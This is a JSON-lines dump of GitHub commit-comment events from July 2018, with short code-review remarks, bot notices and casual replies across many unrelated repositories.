{"id":"8028469155","type":"CommitCommentEvent","actor":{"login":"taburetkared"},"repo":{"name":"glad/recipes"},"payload":{"comment":{"id":29858245,"position":26,"line":26,"path":"chickpea-cookie-dough-bites/chickpea-cookie-dough-bites.md","commit_id":"003a4d9881c6fcb087d9d12f574ed5d279eb536d","created_at":"2018-07-27T13:01:53Z","updated_at":"2018-07-27T13:01:53Z","author_association":"NONE","body":"гнпсс\r\n"}},"created_at":"2018-07-27T13:01:53Z"}
{"id":"8028469464","type":"CommitCommentEvent","actor":{"login":"qlstudent"},"repo":{"name":"qlstudent/utah"},"payload":{"comment":{"id":29858248,"position":null,"line":null,"path":null,"commit_id":"dd0ea78a0546d03accaeadfc2765b3c66de71ce7","created_at":"2018-07-27T13:01:56Z","updated_at":"2018-07-27T13:01:56Z","author_association":"OWNER","body":"Created multidev environment [utah#ci-11](https://dashboard.pantheon.io/sites/68d521b0-a1e8-413a-8aa5-600382891d43#ci-11).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-11-utah.pantheonsite.io/)"}},"created_at":"2018-07-27T13:01:56Z"}
{"id":"8028471970","type":"CommitCommentEvent","actor":{"login":"gygrazok"},"repo":{"name":"gygrazok/witchmod"},"payload":{"comment":{"id":29858256,"position":null,"line":null,"path":null,"commit_id":"160664495c52a75a7b28796d612cda4f14ffd0f3","created_at":"2018-07-27T13:02:27Z","updated_at":"2018-07-27T13:02:27Z","author_association":"OWNER","body":"Hi, thanks for the contribution, I really appreciate that! I'll try to include your art in the next release"}},"created_at":"2018-07-27T13:02:27Z"}
{"id":"8028473079","type":"CommitCommentEvent","actor":{"login":"danthonywalker"},"repo":{"name":"Discord4J/Discord4J"},"payload":{"comment":{"id":29858258,"position":9,"line":175,"path":"build.gradle","commit_id":"94fe39be24f7c53a34bfdc13529fe3e4473c2382","created_at":"2018-07-27T13:02:41Z","updated_at":"2018-07-27T13:02:41Z","author_association":"MEMBER","body":"If the URL changes in the future then the task would fail. I'll see if the effects of `distributionType=ALL` respects the `gradleVersion` though.\r\n\r\nWe only ever use Gradle in the command-line for CI. So whether we change the version in the `build.gradle` or in our CI doesn't make a difference, would rather it be explicitly defined in the `build.gradle`."}},"created_at":"2018-07-27T13:02:41Z"}
{"id":"8028474691","type":"CommitCommentEvent","actor":{"login":"9034725985"},"repo":{"name":"qlstudent/utah"},"payload":{"comment":{"id":29858262,"position":5,"line":10,"path":"config/user.role.anonymous.yml","commit_id":"bea751a699f12f604cdc8f2149f68324cd746973","created_at":"2018-07-27T13:03:02Z","updated_at":"2018-07-27T13:03:02Z","author_association":"CONTRIBUTOR","body":"ayyy "}},"created_at":"2018-07-27T13:03:02Z"}
{"id":"8028475821","type":"CommitCommentEvent","actor":{"login":"qlstudent"},"repo":{"name":"qlstudent/utah"},"payload":{"comment":{"id":29858266,"position":5,"line":10,"path":"config/user.role.anonymous.yml","commit_id":"bea751a699f12f604cdc8f2149f68324cd746973","created_at":"2018-07-27T13:03:17Z","updated_at":"2018-07-27T13:03:17Z","author_association":"OWNER","body":"lmao "}},"created_at":"2018-07-27T13:03:17Z"}
{"id":"8028475910","type":"CommitCommentEvent","actor":{"login":"bkushigian"},"repo":{"name":"bkushigian/controlflow"},"payload":{"comment":{"id":29858267,"position":1,"line":1,"path":"src/test/java/de/codesourcery/asm/controlflow/ControlFlowAnalyzerTest.java","commit_id":"8cba7bd7e4ade1c5c067c6c1c1ea1b0743baedf1","created_at":"2018-07-27T13:03:18Z","updated_at":"2018-07-27T13:03:18Z","author_association":"OWNER","body":"Why was this moved?"}},"created_at":"2018-07-27T13:03:18Z"}
{"id":"8028478353","type":"CommitCommentEvent","actor":{"login":"jmoroski"},"repo":{"name":"jmoroski/vcd-ext-sdk-1"},"payload":{"comment":{"id":29858274,"position":18,"line":18,"path":"ui/api-client/packages/sdk/src/i18n/translation.loader.ts","commit_id":"9494303ea085a6dc7f2457572b980eabcabc0ce5","created_at":"2018-07-27T13:03:49Z","updated_at":"2018-07-27T13:03:49Z","author_association":"OWNER","body":"I think this code can go away entirely for now.  I had done this before adding the supported languages configuration.  That bestMatch method during prepareTranslation now handles this fallback."}},"created_at":"2018-07-27T13:03:49Z"}
{"id":"8028479162","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858276,"position":73,"line":73,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T13:03:59Z","updated_at":"2018-07-27T13:03:59Z","author_association":"NONE","body":"wording: instead of `theoretically` I'd go with something like \"datasheet specifies at least 45ms\"\r\nexact wording from DS:\r\n\r\n> During the 45ms that the sensor is measuring, no command can be sent to the sensor. After the 45ms the result can be read out and any command can be sent to the sensor."}},"created_at":"2018-07-27T13:03:59Z"}
{"id":"8028479380","type":"CommitCommentEvent","actor":{"login":"dilshadmeo"},"repo":{"name":"dilshadmeo/gitcourse"},"payload":{"comment":{"id":29858277,"position":null,"line":null,"path":null,"commit_id":"ab6559b0a4f05cabb32d74a0b06744bcd9ff6a4f","created_at":"2018-07-27T13:04:02Z","updated_at":"2018-07-27T13:04:02Z","author_association":"OWNER","body":"<h2>My new Function</h2>"}},"created_at":"2018-07-27T13:04:02Z"}
{"id":"8028481291","type":"CommitCommentEvent","actor":{"login":"hmusavi"},"repo":{"name":"usdot-jpo-ode/jpo-s3-deposit"},"payload":{"comment":{"id":29858283,"position":null,"line":null,"path":null,"commit_id":"1adb203a699f34671f56ecc6f1f8cc3e04982445","created_at":"2018-07-27T13:04:24Z","updated_at":"2018-07-27T13:04:24Z","author_association":"CONTRIBUTOR","body":"Changes look good. I suppose you will also code the handling of the results so that we could handle failures and retries?"}},"created_at":"2018-07-27T13:04:24Z"}
{"id":"8028488948","type":"CommitCommentEvent","actor":{"login":"meteorite78"},"repo":{"name":"meteorite78/project"},"payload":{"comment":{"id":29858298,"position":null,"line":null,"path":null,"commit_id":"93c97c75fe7533b00752e5afdb396a99f1390523","created_at":"2018-07-27T13:05:58Z","updated_at":"2018-07-27T13:05:58Z","author_association":"OWNER","body":"Linux Grep simulator!"}},"created_at":"2018-07-27T13:05:58Z"}
{"id":"8028489054","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858299,"position":25,"line":21,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:05:59Z","updated_at":"2018-07-27T13:05:59Z","author_association":"NONE","body":"1. не очень хорошая идея везде использовать постфикс `_train`, запись получается довольно громозкой и \"заикающейся\": `station.add_train(number_train, type_train)`\r\nлучше просто написать: `station.add_train(number, type)`\r\n2. в общем-то первый пункт я больше \"на будущее\" написал, потому что здесь принципиальная ошибка такая же, как в классе Роут - метод должен принимать объект, а не аттрибуты\r\nдругими словами здесь метод должен принимать объект класса Трей, и уже внутри метода, если это необходимо, можно обращаться к аттрибутам этого объекта\r\nт.е. \"дифиниция\" метода должна выглядеть как-то так: `def add_train(train)`"}},"created_at":"2018-07-27T13:05:59Z"}
{"id":"8028494708","type":"CommitCommentEvent","actor":{"login":"edugallardo"},"repo":{"name":"xemaclaro/PruebaAtos"},"payload":{"comment":{"id":29858309,"position":null,"line":null,"path":null,"commit_id":"15eaf2242c92965d1ba7c7027fe07ec0a2bb3ca9","created_at":"2018-07-27T13:07:10Z","updated_at":"2018-07-27T13:07:10Z","author_association":"COLLABORATOR","body":"Aquí aparecen todos los cambios, es ideal para comprobarlos"}},"created_at":"2018-07-27T13:07:10Z"}
{"id":"8028494947","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29858310,"position":null,"line":null,"path":null,"commit_id":"70b7d899f362d29d4337225596139b7aea03fdfe","created_at":"2018-07-27T13:07:12Z","updated_at":"2018-07-27T13:07:12Z","author_association":"NONE","body":"kiva-longwave (nealkruis) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1708 of 1708 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-70b7d899f362d29d4337225596139b7aea03fdfe-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-40.04%25-green.png)</a>\n"}},"created_at":"2018-07-27T13:07:12Z"}
{"id":"8028496022","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858313,"position":83,"line":83,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T13:07:26Z","updated_at":"2018-07-27T13:07:26Z","author_association":"NONE","body":"two things: `int16_t` and `| data[8]`\r\n\r\nDatasheet:\r\n\r\n> Byte7: Scale Factor differential pressure 8msb\r\nByte8: Scale Factor differential pressure 8lsb"}},"created_at":"2018-07-27T13:07:26Z"}
{"id":"8028498003","type":"CommitCommentEvent","actor":{"login":"iFlyinqMC"},"repo":{"name":"TryDex07/apw-dev-test"},"payload":{"comment":{"id":29858320,"position":null,"line":null,"path":null,"commit_id":"100746ad18e48b25b74d650fe3b77a9e987e4a6e","created_at":"2018-07-27T13:07:51Z","updated_at":"2018-07-27T13:07:51Z","author_association":"NONE","body":"Goed! Delete maar 👍 "}},"created_at":"2018-07-27T13:07:51Z"}
{"id":"8028498255","type":"CommitCommentEvent","actor":{"login":"rawatamit"},"repo":{"name":"bkushigian/controlflow"},"payload":{"comment":{"id":29858321,"position":5,"line":51,"path":"src/main/java/de/codesourcery/asm/controlflow/ControlFlowGrapher.java","commit_id":"8cba7bd7e4ade1c5c067c6c1c1ea1b0743baedf1","created_at":"2018-07-27T13:07:54Z","updated_at":"2018-07-27T13:07:54Z","author_association":"COLLABORATOR","body":"oh the ide highlighted that these exception need not be thrown so i removed the throw phrases, we can add it back if that's preferred"}},"created_at":"2018-07-27T13:07:54Z"}
{"id":"8028498895","type":"CommitCommentEvent","actor":{"login":"vforteli"},"repo":{"name":"vforteli/Flexinets.Radius.RadiusServer"},"payload":{"comment":{"id":29858323,"position":null,"line":null,"path":null,"commit_id":"41775d8e0e8a56aff4fb8d228c0377678f41800c","created_at":"2018-07-27T13:08:03Z","updated_at":"2018-07-27T13:08:03Z","author_association":"OWNER","body":"https://github.com/vforteli/Flexinets.Radius.RadiusServer/commit/2d3340a180ae7e500bc3821bb13b1d5d65405ce7 also on nuget now"}},"created_at":"2018-07-27T13:08:03Z"}
{"id":"8028500449","type":"CommitCommentEvent","actor":{"login":"abrauchli"},"repo":{"name":"winkj/arduino-sdp"},"payload":{"comment":{"id":29858324,"position":86,"line":86,"path":"sdpsensor.cpp","commit_id":"6363337852e6497e26cb1fbdab1abc5ceb5af12e","created_at":"2018-07-27T13:08:20Z","updated_at":"2018-07-27T13:08:20Z","author_association":"NONE","body":"`200.0f` to avoid double-precision division"}},"created_at":"2018-07-27T13:08:20Z"}
{"id":"8028506531","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/fontconfig-feedstock"},"payload":{"comment":{"id":29858338,"position":null,"line":null,"path":null,"commit_id":"e458b27d15ff416d28440ea6372db45910d169ab","created_at":"2018-07-27T13:09:30Z","updated_at":"2018-07-27T13:09:30Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @mingwandroid was added to this feedstock maintenance team.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T13:09:30Z"}
{"id":"8028506871","type":"CommitCommentEvent","actor":{"login":"chuxubank"},"repo":{"name":"Homebrew/homebrew-cask"},"payload":{"comment":{"id":29858339,"position":null,"line":null,"path":null,"commit_id":"e563a0606c848e4380e41087e498531e1f044fe2","created_at":"2018-07-27T13:09:34Z","updated_at":"2018-07-27T13:09:34Z","author_association":"NONE","body":"Why my sha256 is e449f8c56a5c78e230a23222d2cf2bcccf1c8998c34c68e341ba022aefc96f77?"}},"created_at":"2018-07-27T13:09:34Z"}
{"id":"8028507700","type":"CommitCommentEvent","actor":{"login":"Akryum"},"repo":{"name":"vuejs/vue-cli"},"payload":{"comment":{"id":29858343,"position":11,"line":10,"path":"packages/@vue/cli/lib/util/rcPath.js","commit_id":"b60dd4b6d36ca58c1d1e7bcac4b69a795cce3763","created_at":"2018-07-27T13:09:44Z","updated_at":"2018-07-27T13:09:44Z","author_association":"MEMBER","body":"I don't think you need the if condition anymore here @yyx990803 "}},"created_at":"2018-07-27T13:09:44Z"}
{"id":"8028508051","type":"CommitCommentEvent","actor":{"login":"DownTheMatrix"},"repo":{"name":"DownTheMatrix/My-Neighborhood-Map-App"},"payload":{"comment":{"id":29858344,"position":null,"line":null,"path":null,"commit_id":"473133799a2c8117dce92bb01d8acfe696881586","created_at":"2018-07-27T13:09:49Z","updated_at":"2018-07-27T13:09:49Z","author_association":"OWNER","body":"Delete src/logo.svg (default icon)"}},"created_at":"2018-07-27T13:09:49Z"}
{"id":"8028511789","type":"CommitCommentEvent","actor":{"login":"bkushigian"},"repo":{"name":"bkushigian/controlflow"},"payload":{"comment":{"id":29858353,"position":5,"line":51,"path":"src/main/java/de/codesourcery/asm/controlflow/ControlFlowGrapher.java","commit_id":"8cba7bd7e4ade1c5c067c6c1c1ea1b0743baedf1","created_at":"2018-07-27T13:10:33Z","updated_at":"2018-07-27T13:10:33Z","author_association":"OWNER","body":"Yeah, let's not update the original code unless we are fixing a bug or adding a feature needed by medusa. It looks like unneeded code but just to make a possible future PR easier we should tread lightly on inherited code"}},"created_at":"2018-07-27T13:10:33Z"}
{"id":"8028513910","type":"CommitCommentEvent","actor":{"login":"smk87"},"repo":{"name":"smk87/Thesis"},"payload":{"comment":{"id":29858356,"position":null,"line":null,"path":null,"commit_id":"50ab7ddf00bffaf929b26e3899efd0507944a69d","created_at":"2018-07-27T13:10:59Z","updated_at":"2018-07-27T13:10:59Z","author_association":"OWNER","body":"Payment system added."}},"created_at":"2018-07-27T13:10:59Z"}
{"id":"8028520619","type":"CommitCommentEvent","actor":{"login":"alkis"},"repo":{"name":"romkatv/hcproxy"},"payload":{"comment":{"id":29858372,"position":52,"line":52,"path":"dns.cc","commit_id":"0c52f01ff136f1897bdf0bfb691b4a6696759810","created_at":"2018-07-27T13:12:23Z","updated_at":"2018-07-27T13:12:23Z","author_association":"NONE","body":"The line numbers were for the code in the commit. They don't match the code at head. Sorry about that.\r\n\r\nThe above looks ok. The problem (I think exists) is more subtle. If we set refresh=60 sec and ttl=60 **+2e** secs we might sometimes use a 60 **+e** result and sometimes not use a 60 **-e** result. It is a rather fringe case and boils down to using a time we got before entering critical sections. It can be fixed by moving `Clock::now()` inside.\r\n\r\nSince for this to trigger we need thread scheduling delay greater than **e** and ttl is usually a multiple of refresh this inconsistency is almost impossible to trigger :-)"}},"created_at":"2018-07-27T13:12:23Z"}
{"id":"8028520761","type":"CommitCommentEvent","actor":{"login":"artulloss"},"repo":{"name":"pmmp/PocketMine-MP"},"payload":{"comment":{"id":29858373,"position":null,"line":null,"path":null,"commit_id":"f3cf64c2cf24a9a7b99301e4f8091c315423e05d","created_at":"2018-07-27T13:12:25Z","updated_at":"2018-07-27T13:12:25Z","author_association":"NONE","body":"k"}},"created_at":"2018-07-27T13:12:25Z"}
{"id":"8028522525","type":"CommitCommentEvent","actor":{"login":"johannespostler"},"repo":{"name":"nano-bio/langmuir-evaluation"},"payload":{"comment":{"id":29858375,"position":null,"line":null,"path":null,"commit_id":"e5db1f89f4be8fccd4aa12d16ddeafc8d5d68344","created_at":"2018-07-27T13:12:46Z","updated_at":"2018-07-27T13:12:46Z","author_association":"CONTRIBUTOR","body":"nice!"}},"created_at":"2018-07-27T13:12:46Z"}
{"id":"8028522941","type":"CommitCommentEvent","actor":{"login":"Jorropo"},"repo":{"name":"rigelk/PeerTube"},"payload":{"comment":{"id":29858377,"position":null,"line":null,"path":null,"commit_id":"99387afa6539981bbb7870f36c203d868b65dddb","created_at":"2018-07-27T13:12:50Z","updated_at":"2018-07-27T13:12:50Z","author_association":"NONE","body":"Continue, a day it will work !"}},"created_at":"2018-07-27T13:12:50Z"}
{"id":"8028523067","type":"CommitCommentEvent","actor":{"login":"filippomortari"},"repo":{"name":"CrossRef/dul-authority-tool"},"payload":{"comment":{"id":29858378,"position":5,"line":62,"path":"README.md","commit_id":"e41966ccfc6400e087a26078847b4443aab167e6","created_at":"2018-07-27T13:12:52Z","updated_at":"2018-07-27T13:12:52Z","author_association":"NONE","body":"shouldn't `https://dul.crossref.org` be the right one?"}},"created_at":"2018-07-27T13:12:52Z"}
{"id":"8028526422","type":"CommitCommentEvent","actor":{"login":"o-in25"},"repo":{"name":"o-in25/Hat-Trick-Server"},"payload":{"comment":{"id":29858389,"position":null,"line":null,"path":null,"commit_id":"e704be88ead81befd86a3dcd42a5ca0447590cfd","created_at":"2018-07-27T13:13:30Z","updated_at":"2018-07-27T13:13:30Z","author_association":"OWNER","body":"Turns out this wasn't necessary"}},"created_at":"2018-07-27T13:13:30Z"}
{"id":"8028534491","type":"CommitCommentEvent","actor":{"login":"max-underthesun"},"repo":{"name":"DmitriKudriashov/learning"},"payload":{"comment":{"id":29858402,"position":20,"line":16,"path":"Lesson3/l3_class_Station.rb","commit_id":"a2ab6755a41d8091ae0c547c9904326c77b3440b","created_at":"2018-07-27T13:15:10Z","updated_at":"2018-07-27T13:15:10Z","author_association":"NONE","body":"обычно для целей \"просто хранения\" используется массив\r\nно можно наверное оставить и хеш, хотя особых причин для него я не вижу"}},"created_at":"2018-07-27T13:15:10Z"}
{"id":"8028535556","type":"CommitCommentEvent","actor":{"login":"thijsputman"},"repo":{"name":"studyportals/opener"},"payload":{"comment":{"id":29858407,"position":null,"line":null,"path":null,"commit_id":"8a63f291580831d0abb87f3574cce8c246ebc903","created_at":"2018-07-27T13:15:22Z","updated_at":"2018-07-27T13:15:22Z","author_association":"MEMBER","body":"@CZYK Can you have a look at these changes and check whether they're proper/within convention? I'm a bit rusty... 😉"}},"created_at":"2018-07-27T13:15:22Z"}
{"id":"8028539794","type":"CommitCommentEvent","actor":{"login":"przemek-mtk"},"repo":{"name":"przemek-mtk/hello-world-2"},"payload":{"comment":{"id":29858413,"position":null,"line":null,"path":null,"commit_id":"56e5b90e042fe4ed54fa06929acf5f83b02d2427","created_at":"2018-07-27T13:16:11Z","updated_at":"2018-07-27T13:16:11Z","author_association":"OWNER","body":"i leave comment for training, but it is super"}},"created_at":"2018-07-27T13:16:11Z"}
{"id":"8028540012","type":"CommitCommentEvent","actor":{"login":"jeroensak"},"repo":{"name":"jsdom/jsdom"},"payload":{"comment":{"id":29858414,"position":3,"line":3,"path":"Changelog.md","commit_id":"4d26c6773f011205d9c703cc5988e7c117efea31","created_at":"2018-07-27T13:16:13Z","updated_at":"2018-07-27T13:16:13Z","author_association":"NONE","body":"this actually brakes some Jest tests. Am now forced on 11.11.0. Could you confirm?"}},"created_at":"2018-07-27T13:16:13Z"}
{"id":"8028540775","type":"CommitCommentEvent","actor":{"login":"rigelk"},"repo":{"name":"rigelk/PeerTube"},"payload":{"comment":{"id":29858416,"position":null,"line":null,"path":null,"commit_id":"99387afa6539981bbb7870f36c203d868b65dddb","created_at":"2018-07-27T13:16:23Z","updated_at":"2018-07-27T13:16:23Z","author_association":"OWNER","body":":sweat: it's tough to test everything on that PR, though."}},"created_at":"2018-07-27T13:16:23Z"}
{"id":"8028541937","type":"CommitCommentEvent","actor":{"login":"linuswillner"},"repo":{"name":"yo-yo-man/WildBeast"},"payload":{"comment":{"id":29858419,"position":null,"line":null,"path":null,"commit_id":"4421c7e9019e2e1d6288086badf78d01c2c4c3e3","created_at":"2018-07-27T13:16:38Z","updated_at":"2018-07-27T13:16:38Z","author_association":"NONE","body":"You have leaked your Discord API token. Please regenerate it in order to avoid unauthorised access and do not modify **.env.example** - instead, add your tokens and other values in **.env**."}},"created_at":"2018-07-27T13:16:38Z"}
{"id":"8028544253","type":"CommitCommentEvent","actor":{"login":"chrisma"},"repo":{"name":"jupyterhub/ldapauthenticator"},"payload":{"comment":{"id":29858425,"position":8,"line":308,"path":"ldapauthenticator/ldapauthenticator.py","commit_id":"4814984a8bec6edbcc06aec883bdfd2b44c088db","created_at":"2018-07-27T13:17:06Z","updated_at":"2018-07-27T13:17:06Z","author_association":"NONE","body":"Is there a reason to not just use `[re.sub()](https://docs.python.org/2/library/re.html#re.sub)` here? The only difference of `subn` to `sub` is that `subn` returns a tuple `(new_string, number_of_subs_made)`. However, `number_of_subs_made` is discarded here."}},"created_at":"2018-07-27T13:17:06Z"}
{"id":"8028547624","type":"CommitCommentEvent","actor":{"login":"alium"},"repo":{"name":"artix-linux/packages"},"payload":{"comment":{"id":29858441,"position":null,"line":null,"path":null,"commit_id":"0af9cc441376e6a216e15efdd84ad729d46b6e59","created_at":"2018-07-27T13:17:48Z","updated_at":"2018-07-27T13:17:48Z","author_association":"CONTRIBUTOR","body":"After moving linux (4.17.10) to [core] has linux package moved (and deleted) from testing but NOT moving to [core]. In [core] is still 4.17.9., but trizen -S linux write: linux not found. Need a manuall intervention on server. \r\n\r\nI am try to make new package linux-4.17.10-1.1 again, rebuild acpi_call/nvidia/tp_smapi/r8168 etc. but same problem, after moving to [core] nothing is change.... :-( "}},"created_at":"2018-07-27T13:17:48Z"}
{"id":"8028548027","type":"CommitCommentEvent","actor":{"login":"conda-forge-linter"},"repo":{"name":"conda-forge/conan-feedstock"},"payload":{"comment":{"id":29858443,"position":null,"line":null,"path":null,"commit_id":"de9a90e9ed1917573791d71d3e422a892f7a97c6","created_at":"2018-07-27T13:17:53Z","updated_at":"2018-07-27T13:17:53Z","author_association":"NONE","body":"\nHi! This is the friendly automated conda-forge-webservice.\n\nI updated the Github team because of this commit.\n\n- @memsharded was added to conda-forge. Welcome to conda-forge!\n  Go to https://github.com/orgs/conda-forge/invitation see your invitation.\n\nYou should get push access to this feedstock and CI services.\n\nFeel free to join the community [chat room](https://gitter.im/conda-forge/conda-forge.github.io).\n\nNOTE: Please make sure to not push to the repository directly.\n      Use branches in your fork for any changes and send a PR.\n      More details [here](https://conda-forge.org/docs/conda-forge_gotchas.html#using-a-fork-vs-a-branch-when-updating-a-recipe)\n"}},"created_at":"2018-07-27T13:17:53Z"}
{"id":"8028549222","type":"CommitCommentEvent","actor":{"login":"codeMagic23"},"repo":{"name":"room-15/room-15.github.io"},"payload":{"comment":{"id":29858448,"position":null,"line":null,"path":null,"commit_id":"134feba5f4721a50ff9495f1788adda98d56a429","created_at":"2018-07-27T13:18:09Z","updated_at":"2018-07-27T13:18:09Z","author_association":"CONTRIBUTOR","body":"What is the reason for removing this line? It's been kind of important to the culture of the room. "}},"created_at":"2018-07-27T13:18:09Z"}
{"id":"8028561622","type":"CommitCommentEvent","actor":{"login":"aj-th"},"repo":{"name":"aj-th/largefilesplit-python"},"payload":{"comment":{"id":29858466,"position":null,"line":null,"path":null,"commit_id":"c9dd14aaa92c01e69ed05d46915b472d5aecea21","created_at":"2018-07-27T13:20:38Z","updated_at":"2018-07-27T13:20:38Z","author_association":"OWNER","body":"This is the initial version of 0.1 of the file that I ripped from the internet for work"}},"created_at":"2018-07-27T13:20:38Z"}
{"id":"8028568276","type":"CommitCommentEvent","actor":{"login":"rawatamit"},"repo":{"name":"bkushigian/controlflow"},"payload":{"comment":{"id":29858482,"position":1,"line":1,"path":"src/test/java/de/codesourcery/asm/controlflow/ControlFlowAnalyzerTest.java","commit_id":"8cba7bd7e4ade1c5c067c6c1c1ea1b0743baedf1","created_at":"2018-07-27T13:21:58Z","updated_at":"2018-07-27T13:21:58Z","author_association":"COLLABORATOR","body":"Strange I understand that, I only moved it because I had trouble with my IDE. Let me look at the directory structure and I'll fix it so it conforms to the directory structure and still works for me."}},"created_at":"2018-07-27T13:21:58Z"}
{"id":"8028568647","type":"CommitCommentEvent","actor":{"login":"Jorropo"},"repo":{"name":"rigelk/PeerTube"},"payload":{"comment":{"id":29858485,"position":null,"line":null,"path":null,"commit_id":"4f7eee5e874b7eecf1c1d76a9b24db216074d9c8","created_at":"2018-07-27T13:22:03Z","updated_at":"2018-07-27T13:22:03Z","author_association":"NONE","body":"It worked finaly !\r\nGG"}},"created_at":"2018-07-27T13:22:03Z"}
{"id":"8028569248","type":"CommitCommentEvent","actor":{"login":"TimCastelijns"},"repo":{"name":"room-15/room-15.github.io"},"payload":{"comment":{"id":29858488,"position":null,"line":null,"path":null,"commit_id":"134feba5f4721a50ff9495f1788adda98d56a429","created_at":"2018-07-27T13:22:10Z","updated_at":"2018-07-27T13:22:10Z","author_association":"NONE","body":"I think it's covered by \"Room owners are free to enforce the rules as they see fit\". I've never seen anyone get banned for pinging, usually we just remind them of the rule and then it's OK. Also, no other rule states what can happen if you don't follow it."}},"created_at":"2018-07-27T13:22:10Z"}
{"id":"8028575558","type":"CommitCommentEvent","actor":{"login":"jcormier"},"repo":{"name":"sameersbn/docker-redmine"},"payload":{"comment":{"id":29858501,"position":null,"line":null,"path":null,"commit_id":"a573cc0561b1a7077e05d6a707a24115a1e4764f","created_at":"2018-07-27T13:23:27Z","updated_at":"2018-07-27T13:23:27Z","author_association":"COLLABORATOR","body":"Confirmed"}},"created_at":"2018-07-27T13:23:27Z"}
{"id":"8028575624","type":"CommitCommentEvent","actor":{"login":"amio"},"repo":{"name":"amio/badgen-service"},"payload":{"comment":{"id":29858502,"position":null,"line":null,"path":null,"commit_id":"55970a895d56e96871886d73a41e003bc31050be","created_at":"2018-07-27T13:23:28Z","updated_at":"2018-07-27T13:23:28Z","author_association":"OWNER","body":"`simple-icons` doesn't set the color, then it's default in black. Updated the whiten method to set color to white. 1b80ed3f8202d8fc816f893bec7480b4fd1fb85c"}},"created_at":"2018-07-27T13:23:28Z"}
{"id":"8028576200","type":"CommitCommentEvent","actor":{"login":"einiemand"},"repo":{"name":"einiemand/leetcoding"},"payload":{"comment":{"id":29858503,"position":1,"line":1,"path":"problems/214. Shortest Palindrome","commit_id":"ae75be7cd8fc1a03f0f42d8f13a7133095049a93","created_at":"2018-07-27T13:23:35Z","updated_at":"2018-07-27T13:23:35Z","author_association":"OWNER","body":"KMP"}},"created_at":"2018-07-27T13:23:35Z"}
{"id":"8028579685","type":"CommitCommentEvent","actor":{"login":"nguyenphuocthang"},"repo":{"name":"XiaoMi/mace"},"payload":{"comment":{"id":29858508,"position":2,"line":55,"path":"README.md","commit_id":"f6db015d1c2ccd50ef21d04005c68ac3b2ad6ff7","created_at":"2018-07-27T13:24:17Z","updated_at":"2018-07-27T13:24:17Z","author_association":"NONE","body":"Chào "}},"created_at":"2018-07-27T13:24:17Z"}
{"id":"8028605428","type":"CommitCommentEvent","actor":{"login":"jack-h"},"repo":{"name":"casper-astro/mlib_devel"},"payload":{"comment":{"id":29858562,"position":null,"line":null,"path":null,"commit_id":"55e5a4ff5a32fd7693ccb410e9c6d221f89ed48d","created_at":"2018-07-27T13:29:27Z","updated_at":"2018-07-27T13:29:27Z","author_association":"CONTRIBUTOR","body":"I mean, there was no need to point fingers."}},"created_at":"2018-07-27T13:29:27Z"}
{"id":"8028607051","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"RezYlander/OOP-carousell"},"payload":{"comment":{"id":29858564,"position":92,"line":112,"path":"src/scripts/slider.js","commit_id":"304c9fed7df3d8798c320047e806d64ee8c67d74","created_at":"2018-07-27T13:29:45Z","updated_at":"2018-07-27T13:29:45Z","author_association":"NONE","body":"Skeszuj sobie `listElements[this.counter]` do jakiejś zmiennej"}},"created_at":"2018-07-27T13:29:45Z"}
{"id":"8028607540","type":"CommitCommentEvent","actor":{"login":"lepirlouit"},"repo":{"name":"aws-amplify/amplify-js"},"payload":{"comment":{"id":29858566,"position":null,"line":null,"path":null,"commit_id":"a2c50b291e9eda59cf551e3dc963b137f2685f6e","created_at":"2018-07-27T13:29:51Z","updated_at":"2018-07-27T13:29:51Z","author_association":"NONE","body":"If you wrap all the authenticator elements into a TouchableWithoutFeedback elemnt,\r\nyou are unable to scroll / open a drawer in your application.\r\nspécially if you use the \"withAuthenticator\" shortcut.\r\n\r\nopen question in medium here : https://medium.com/@demsey2/do-you-know-any-way-to-customise-the-view-we-have-from-withauthenticator-6c5a123c4801"}},"created_at":"2018-07-27T13:29:51Z"}
